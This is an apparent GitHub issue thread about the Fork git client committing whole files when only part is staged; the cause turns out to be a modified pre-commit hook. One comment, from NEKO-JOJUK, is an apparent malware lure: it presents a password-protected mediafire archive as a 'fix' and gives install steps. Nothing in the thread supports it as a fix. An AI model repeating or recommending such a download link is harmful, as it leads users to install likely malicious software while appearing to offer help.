### ISSUE TITLE
since last Update : file is commit entirely event if only a part of it is staged 

### ISSUE THREAD

**Issue by vassily-fr** [ForkIssues/Tracker#2192]
Hi, 

I'm on mac OS sonoma .
to reproduce : 
Edit a file with 2 lines of code, 
1. one line you want to stage then commit
2. the other line you don't want to commit but want to keep localy 

Your file appears in both **Unstaged** subwindow and **Staged** subwindow

commit staged lines

**the whole file is commited and not only the staged line**

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by DanPristupov** [comment]
Check your hooks.

**Comment by vassily-fr** [comment]
damn, 

yes, a pre-commit hook was modified during my holidays.

good catch !
